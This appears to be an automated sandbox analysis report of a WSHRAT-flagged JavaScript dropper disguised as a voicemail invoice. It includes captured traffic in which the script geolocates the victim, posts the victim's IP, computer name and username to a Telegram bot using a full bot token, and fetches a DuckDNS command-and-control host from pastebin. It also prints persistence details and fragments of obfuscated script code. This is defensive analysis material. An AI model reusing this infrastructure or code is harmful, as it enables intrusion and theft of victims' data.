2024-05-22 00:46:41 UTC	1369	IN	Data Raw: 2c 30 78 32 30 37 32 29 5d 29 3b 65 6c 73 65 7b 66 6f 72 28 76 61 72 20 5f 30 78 34 32 33 32 34 33 3d 30 78 32 2a 30 78 33 61 61 2b 2d 30 78 31 61 36 2a 2d 30 78 31 30 2b 2d 30 78 32 31 62 34 3b 5f 30 78 61 36 31 62 38 64 5b 5f 30 78 32 30 34 64 34 37 28 30 78 32 32 63 34 2c 30 78 33 32 36 36 2c 30 78 32 61 30 31 2c 30 78 32 62 34 33 29 5d 28 5f 30 78 34 32 33 32 34 33 2c 62 6c 6f 63 6b 65 64 41 53 4e 73 5b 27 6c 65 6e 67 74 68 27 5d 29 3b 5f 30 78 34 32 33 32 34 33 2b 2b 29 7b 69 66 28 5f 30 78 61 36 31 62 38 64 5b 5f 30 78 32 30 34 64 34 37 28 30 78 33 36 36 39 2c 30 78 32 33 34 30 2c 30 78 31 62 34 30 2c 30 78 31 62 31 30 29 5d 28 5f 30 78 61 36 31 62 38 64 5b 5f 30 78 32 39 63 35 38 63 28 30 78 32 34 66 33 2c 30 78 32 63 31 37 2c 30 78 33 33 64 62 2c Data Ascii: ,0x2072)]);else{for(var _0x423243=0x20x3aa+-0x1a6-0x10+-0x21b4;_0xa61b8d[_0x204d47(0x22c4,0x3266,0x2a01,0x2b43)](_0x423243,blockedASNs['length']);_0x423243++){if(_0xa61b8d[_0x204d47(0x3669,0x2340,0x1b40,0x1b10)](_0xa61b8d[_0x29c58c(0x24f3,0x2c17,0x33db,
2024-05-22 00:46:41 UTC	1369	IN	Data Raw: 67 74 68 27 5d 3b 5f 30 78 63 38 33 33 64 32 2b 2b 29 7b 69 66 28 5f 30 78 61 36 31 62 38 64 5b 27 72 55 65 4d 6f 27 5d 28 62 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 69 65 73 5b 5f 30 78 63 38 33 33 64 32 5d 2c 5f 30 78 33 39 34 64 33 64 29 29 7b 5f 30 78 35 63 61 35 33 32 3d 21 21 5b 5d 3b 62 72 65 61 6b 3b 7d 7d 7d 7d 63 61 74 63 68 28 5f 30 78 31 38 35 33 64 30 29 7b 7d 72 65 74 75 72 6e 20 5f 30 78 35 63 61 35 33 32 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 64 38 66 28 5f 30 78 31 33 31 64 30 36 2c 5f 30 78 62 34 65 61 32 39 29 7b 76 61 72 20 5f 30 78 35 61 32 30 37 36 3d 5f 30 78 65 39 39 36 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 35 64 38 66 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 37 39 36 66 63 64 2c 5f 30 78 34 31 62 39 33 63 29 7b 5f 30 78 37 39 36 Data Ascii: gth'];_0xc833d2++){if(_0xa61b8d['rUeMo'](blockedCountries[_0xc833d2],_0x394d3d)){_0x5ca532=!![];break;}}}}catch(_0x1853d0){}return _0x5ca532;}function _0x5d8f(_0x131d06,_0xb4ea29){var _0x5a2076=_0xe996();return _0x5d8f=function(_0x796fcd,_0x41b93c){_0x796

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	104.21.25.148	443	5660	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-22 00:46:47 UTC	281	OUT	GET / HTTP/1.1 Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: json.geoiplookup.io Connection: Keep-Alive
2024-05-22 00:46:47 UTC	796	IN	HTTP/1.1 200 OK Date: Wed, 22 May 2024 00:46:47 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close vary: Accept-Encoding access-control-allow-origin: * x-ratelimit-limit: 10000 x-ratelimit-remaining: 9999 x-powered-by: Octolus x-content-type-options: nosniff x-content-type-options: nosniff x-xss-protection: 1; mode=block CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BdHJSLeSNa43dgYG7gU3SNU2fPbZGmpF0nBucg2tm0BeFc81phBKXAPQkTQXyDAt33HWCFm1C7KoJ80PmqRE0EJby9K1tAq05P5bDPHMKSpUmCdIYl%2FhhFBrFPSihEvPVyVVHxOC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8878ca8b2f048c8a-EWR alt-svc: h3=":443"; ma=86400
2024-05-22 00:46:47 UTC	573	IN	Data Raw: 32 65 34 0d 0a 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 0a 20 20 20 20 22 69 73 70 22 3a 20 22 4c 65 76 65 6c 20 33 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 37 35 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 6c 61 74 69 74 75 64 65 22 3a 20 34 30 2e 37 31 32 38 2c 0a 20 20 20 20 22 6c 6f 6e 67 69 74 75 64 65 22 3a 20 2d 37 34 2e 30 30 36 2c 0a 20 20 20 20 22 70 6f 73 74 61 6c 5f 63 6f 64 65 22 3a 20 22 31 30 31 32 33 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 Data Ascii: 2e4{ "ip": "8.46.123.175", "isp": "Level 3", "org": "CenturyLink Communications, LLC", "hostname": "static-cpe-8-46-123-175.centurylink.com", "latitude": 40.7128, "longitude": -74.006, "postal_code": "10123", "city": "New
2024-05-22 00:46:47 UTC	174	IN	Data Raw: 61 74 69 6f 6e 73 2c 20 49 6e 63 2e 22 2c 0a 20 20 20 20 22 61 73 6e 22 3a 20 22 41 53 33 33 35 36 20 2d 20 4c 65 76 65 6c 20 33 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 49 6e 63 2e 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 63 6f 64 65 22 3a 20 22 55 53 44 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 6e 61 6d 65 22 3a 20 22 55 53 20 44 6f 6c 6c 61 72 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 70 72 65 6d 69 75 6d 22 3a 20 66 61 6c 73 65 0a 7d 0d 0a Data Ascii: ations, Inc.", "asn": "AS3356 - Level 3 Communications, Inc.", "currency_code": "USD", "currency_name": "US Dollar", "success": true, "premium": false}
2024-05-22 00:46:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49735	149.154.167.220	443	5660	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-22 00:46:48 UTC	289	OUT	POST /bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessage HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Accept: / Accept-Language: en-ch User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 104 Host: api.telegram.org
2024-05-22 00:46:48 UTC	104	OUT	Data Raw: 7b 22 63 68 61 74 5f 69 64 22 3a 22 36 34 38 31 32 37 30 39 30 38 22 2c 22 74 65 78 74 22 3a 22 41 63 63 65 73 73 20 67 72 61 6e 74 65 64 21 20 49 50 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 2c 20 43 6f 6d 70 75 74 65 72 20 4e 61 6d 65 3a 20 4a 4f 4e 45 53 2d 50 43 2c 20 55 73 65 72 3a 20 6a 6f 6e 65 73 22 7d Data Ascii: {"chat_id":"6481270908","text":"Access granted! IP: 8.46.123.175, Computer Name: user-PC, User: user"}
2024-05-22 00:46:48 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 22 May 2024 00:46:48 GMT Content-Type: application/json Content-Length: 350 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-05-22 00:46:48 UTC	350	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 31 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 39 36 38 31 32 36 34 36 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 46 49 4c 45 20 43 4c 49 43 4b 45 44 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 6c 69 6b 65 64 61 62 6f 66 69 6c 65 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 34 38 31 32 37 30 39 30 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 61 64 69 6e 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 36 33 33 38 38 30 38 2c 22 74 65 78 74 22 3a 22 41 63 63 65 73 73 20 67 72 61 6e 74 65 64 21 20 49 50 3a 20 38 2e 34 36 2e 31 32 33 2e 31 Data Ascii: {"ok":true,"result":{"message_id":2155,"from":{"id":6968126468,"is_bot":true,"first_name":"FILE CLICKED","username":"clikedabofilebot"},"chat":{"id":6481270908,"first_name":"Xadin","type":"private"},"date":1716338808,"text":"Access granted! IP: 8.46.123.1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49740	104.20.3.235	443	5660	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-22 00:46:50 UTC	158	OUT	GET /raw/NsQ5qTHr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-05-22 00:46:50 UTC	388	IN	HTTP/1.1 200 OK Date: Wed, 22 May 2024 00:46:50 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: MISS Last-Modified: Wed, 22 May 2024 00:46:50 GMT Server: cloudflare CF-RAY: 8878ca9c0e708ca5-EWR
2024-05-22 00:46:50 UTC	29	IN	Data Raw: 31 37 0d 0a 6d 61 73 74 65 72 6f 6b 72 77 68 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 0d 0a Data Ascii: 17masterokrwh.duckdns.org
2024-05-22 00:46:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49746	104.21.25.148	443	5700	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-22 00:47:23 UTC	281	OUT	GET / HTTP/1.1 Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: json.geoiplookup.io Connection: Keep-Alive
2024-05-22 00:47:24 UTC	806	IN	HTTP/1.1 200 OK Date: Wed, 22 May 2024 00:47:24 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close vary: Accept-Encoding access-control-allow-origin: * x-ratelimit-limit: 10000 x-ratelimit-remaining: 9998 x-powered-by: Octolus x-content-type-options: nosniff x-content-type-options: nosniff x-xss-protection: 1; mode=block CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tEWIoPbpWMnjBgWPtjlOcyrMtXVKHO%2FUPZ84R0oQM507rNsbQUCFUMhyTCOnPs7I78MDVF%2FDq2oqCWFRIpIPGhBhEQinnaHSU%2F15Sy%2FPcdfvI9b1x%2BF2QhBnKHptRZvyfmzJ%2FdPb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8878cb6f284b72b9-EWR alt-svc: h3=":443"; ma=86400
2024-05-22 00:47:24 UTC	563	IN	Data Raw: 32 65 34 0d 0a 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 0a 20 20 20 20 22 69 73 70 22 3a 20 22 4c 65 76 65 6c 20 33 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 37 35 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 6c 61 74 69 74 75 64 65 22 3a 20 34 30 2e 37 31 32 38 2c 0a 20 20 20 20 22 6c 6f 6e 67 69 74 75 64 65 22 3a 20 2d 37 34 2e 30 30 36 2c 0a 20 20 20 20 22 70 6f 73 74 61 6c 5f 63 6f 64 65 22 3a 20 22 31 30 31 32 33 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 Data Ascii: 2e4{ "ip": "8.46.123.175", "isp": "Level 3", "org": "CenturyLink Communications, LLC", "hostname": "static-cpe-8-46-123-175.centurylink.com", "latitude": 40.7128, "longitude": -74.006, "postal_code": "10123", "city": "New
2024-05-22 00:47:24 UTC	184	IN	Data Raw: 33 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 49 6e 63 2e 22 2c 0a 20 20 20 20 22 61 73 6e 22 3a 20 22 41 53 33 33 35 36 20 2d 20 4c 65 76 65 6c 20 33 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 49 6e 63 2e 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 63 6f 64 65 22 3a 20 22 55 53 44 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 6e 61 6d 65 22 3a 20 22 55 53 20 44 6f 6c 6c 61 72 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 70 72 65 6d 69 75 6d 22 3a 20 66 61 6c 73 65 0a 7d 0d 0a Data Ascii: 3 Communications, Inc.", "asn": "AS3356 - Level 3 Communications, Inc.", "currency_code": "USD", "currency_name": "US Dollar", "success": true, "premium": false}
2024-05-22 00:47:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49747	149.154.167.220	443	5700	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-22 00:47:25 UTC	289	OUT	POST /bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessage HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Accept: / Accept-Language: en-ch User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 104 Host: api.telegram.org
2024-05-22 00:47:25 UTC	104	OUT	Data Raw: 7b 22 63 68 61 74 5f 69 64 22 3a 22 36 34 38 31 32 37 30 39 30 38 22 2c 22 74 65 78 74 22 3a 22 41 63 63 65 73 73 20 67 72 61 6e 74 65 64 21 20 49 50 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 2c 20 43 6f 6d 70 75 74 65 72 20 4e 61 6d 65 3a 20 4a 4f 4e 45 53 2d 50 43 2c 20 55 73 65 72 3a 20 6a 6f 6e 65 73 22 7d Data Ascii: {"chat_id":"6481270908","text":"Access granted! IP: 8.46.123.175, Computer Name: user-PC, User: user"}
2024-05-22 00:47:25 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 22 May 2024 00:47:25 GMT Content-Type: application/json Content-Length: 350 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-05-22 00:47:25 UTC	350	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 31 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 39 36 38 31 32 36 34 36 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 46 49 4c 45 20 43 4c 49 43 4b 45 44 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 6c 69 6b 65 64 61 62 6f 66 69 6c 65 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 34 38 31 32 37 30 39 30 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 61 64 69 6e 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 36 33 33 38 38 34 35 2c 22 74 65 78 74 22 3a 22 41 63 63 65 73 73 20 67 72 61 6e 74 65 64 21 20 49 50 3a 20 38 2e 34 36 2e 31 32 33 2e 31 Data Ascii: {"ok":true,"result":{"message_id":2156,"from":{"id":6968126468,"is_bot":true,"first_name":"FILE CLICKED","username":"clikedabofilebot"},"chat":{"id":6481270908,"first_name":"Xadin","type":"private"},"date":1716338845,"text":"Access granted! IP: 8.46.123.1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49749	104.20.4.235	443	5700	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-22 00:47:26 UTC	158	OUT	GET /raw/NsQ5qTHr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-05-22 00:47:26 UTC	396	IN	HTTP/1.1 200 OK Date: Wed, 22 May 2024 00:47:26 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 36 Last-Modified: Wed, 22 May 2024 00:46:50 GMT Server: cloudflare CF-RAY: 8878cb7f9e688c69-EWR
2024-05-22 00:47:26 UTC	29	IN	Data Raw: 31 37 0d 0a 6d 61 73 74 65 72 6f 6b 72 77 68 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 0d 0a Data Ascii: 17masterokrwh.duckdns.org
2024-05-22 00:47:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	20:46:28
Start date:	21/05/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New Voicemail Invoice 64746w .js"
Imagebase:	0x7ff66e3f0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	20:46:42
Start date:	21/05/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\98575.js"
Imagebase:	0x7ff66e3f0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000001.00000002.2938355431.00000193969C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000001.00000003.1797163332.00000193950DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000001.00000002.2937053189.00000193950D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000001.00000002.2938800577.0000019396F69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000001.00000003.1797358254.00000193952B4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000001.00000002.2937216627.00000193952BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000001.00000002.2936761014.0000019394DFC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000001.00000002.2937959613.0000019396384000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	20:47:03
Start date:	21/05/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\98575.js"
Imagebase:	0x7ff66e3f0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	20:47:11
Start date:	21/05/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\98575.js"
Imagebase:	0x7ff66e3f0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: wscript.exePID: 5700, Parent PID: 2580

General

Target ID:	7
Start time:	20:47:20
Start date:	21/05/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\98575.js"
Imagebase:	0x7ff66e3f0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000007.00000003.2180517172.0000027242C12000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000007.00000003.2255737493.0000027242A3F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000007.00000003.2256293540.0000027242C1E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000007.00000003.2180342190.0000027242A3E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000007.00000003.2255570115.0000027242752000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000007.00000003.2251240073.0000027244ABA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000007.00000003.2255381138.0000027243CE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

JavaScript Code

Call Graph

Executed
Not Executed

Script:

Code
0	( function (_0x5b701d, _0x2ea873) {	(function _0x51d7(),983513) ➔ undefined (function _0x51d7(),983513) ➔ undefined
1	function _0x201ac8(_0x419fae, _0x47d5cb, _0x58585c, _0x191da1) {	_0x201ac8(-577,-646,-675,-513) ➔ "Unknown" _0x201ac8(-601,-608,-528,-529) ➔ "VozMu" _0x201ac8(-629,-658,-652,-676) ➔ "countryCod" _0x201ac8(-548,-602,-499,-568) ➔ "bKqBF" _0x201ac8(-665,-579,-761,-695) ➔ "MSXML2.Ser" _0x201ac8(-592,-618,-549,-500) ➔ ", Computer" _0x201ac8(-577,-646,-675,-513) ➔ "ell" _0x201ac8(-601,-608,-528,-529) ➔ "https://te" _0x201ac8(-629,-658,-652,-676) ➔ " Safari/53" _0x201ac8(-548,-602,-499,-568) ➔ "wscript ""
2	return _0xbb87 ( _0x419fae - - 0x39e, _0x58585c );	_0xbb87(349,-675) ➔ "Unknown" _0xbb87(325,-528) ➔ "VozMu" _0xbb87(297,-652) ➔ "countryCod" _0xbb87(378,-499) ➔ "bKqBF" _0xbb87(261,-761) ➔ "MSXML2.Ser" _0xbb87(334,-549) ➔ ", Computer" _0xbb87(349,-675) ➔ "ell" _0xbb87(325,-528) ➔ "https://te" _0xbb87(297,-652) ➔ " Safari/53" _0xbb87(378,-499) ➔ "wscript ""
3	}
4	var _0x156d23 = _0x5b701d ( );	_0x51d7() ➔ wfb1Bwm,vfzJCu8,BI9QC29U,mcaOv2LUzg93CW,mZC1mJHUCK9JrxG,sLDkvKm3AgPhqq,n3W0Fdv8mNW4Fa,D2XPs1e,y29TChv0zxjoyq,ienOCM9Tzs83mW,y29UC3rYDwn0BW,vhLWzq,CM1sy2O,uMPfzgO,qvm0nZq0mq,C3rYAw5NAwz5,t0z3vg4,z2vZlMrLDI85oa,DvDjyNG,AKTmrNO,qvmYmdq3mW,rM5cDLu,AK9HC0K,ChvZAa,lcbvC2vYoIa,CMvZCg9UC2vcBW,yxnU,CM9UBwvUDfn0CG,y2fuCw0,sgrurNm,EKnPDNC,ExDmwK4,ohW1FdL8mNWXma,yKTJwg8,tZi1BxDN,rwzosMK,lMPHCG,DKThtK4,rwnOBW,AwTLieDLy2TVkq,mtaWnJK5odzLz1vTs0m,qvmXmJG3na,mtvowfHQtMi,Aw1pvK0,t2f6Ahy,sgvHzgvY,t0XrD0i,BxHetuS,nZqWnZe2B3PUCM9M,ALLItfe,qvmZotyZnJi,rM1WyM4,rxHWyw5Krw52Aq,yLLnsM8,CgjUDgS,zLburw8,nxWZ,AMf2ysaTAMfYia,C3rYAw5N,C3rHDhvZ,oKfbrKj1y0yWvq,AxbbzgrYzxnZ,C2f2zxrVzMLSzq,qvmZmdyZmW,qvm0nJu2mG,CNbfzKC,qwnJzxnZigDYyq,vfjJvKe,mZiZnJa2ne9LDMfXuW,qvm4ntyW,CNDWD28,tvnytuWYlLnLCG,q29UDgvUDc1uEq,yxbWBgLJyxrPBW,y2HHDf9Pza,sevyswG,r0vu,nJi3mdmWmejJALLjEG,qvmXnZq,junptvbvvevstG,EKTkD0i,qvmYnti5mq,EhrQzgjPBwfUCG,l3nLBMrnzxnZyq,wMniA1u,D3ndDKu,CgfYC2u,qvmXmJCZmq,tMn0suW,qvm3nZG2,tgHsthm,qwnJzxnZigjSBW,mJKWnJG3nK95tLf4Cq,A0rAEhq,qwrVzgiUu3rYzq,qvmYndK2mq,Ahr0Chm6lY9QCW,B3Dds0q,ruXozeq,ufrqqwO,y2XVC2u,DMzozKi,C2v0uMvXDwvZDa,suLduLi,Bxn4BwWYlNHTBa,vxnLCI1bz2vUDa,ChjVDg90ExbL,y291BNrYEunVza,ifnHzMfYAs81mW,qvmZnJm1mq,ie5HBwu6ia,vLH6vKC,uxvPDa,uMHnB0G,nY4ZnG,DxnLCG,C3bSAxq,v2LUnJq7ihG2na,Ahr0Chm6lY9HCa,nty1ntq4BLn1CMDj,qvm5mda5,odyXswHXz2PX,C2vUza,lNzICW,rxDUtKC,rhnhr1i,A0vItwe,icHlsfrntcWGBa,lJaUmZy4mY44nG,r3LivMO,vvDuyK8,uKTrthC,yNnmwhe,v01fyuG,EMv4s1u,vM96txu,Ahr0Chm6lY90zq,qvmYmdi0mde,qvmYnte2ma,weXltKC,Cu5PswS,uhnQse0,uKzeCu8,qvmYotm4nG,lcbdB21WDxrLCG,we1msfruua,AfffwMe,B24Uz2vVAxbSBW,rKzZCeW,mxW0Fdz8mhWYFa,jvvtrvjoqu1fjq,s2L0lZuZnY4ZnG,BKvvCNq,ywrSv3m,ie5uideWlJa7ia,BwLUAwfSBc5Wyq,EvHfBxy,CNvU,B3bLBG,vw5RBM93BG,zwXS,EgTIyw8,qu1fjq,qvmXotG2mdu,C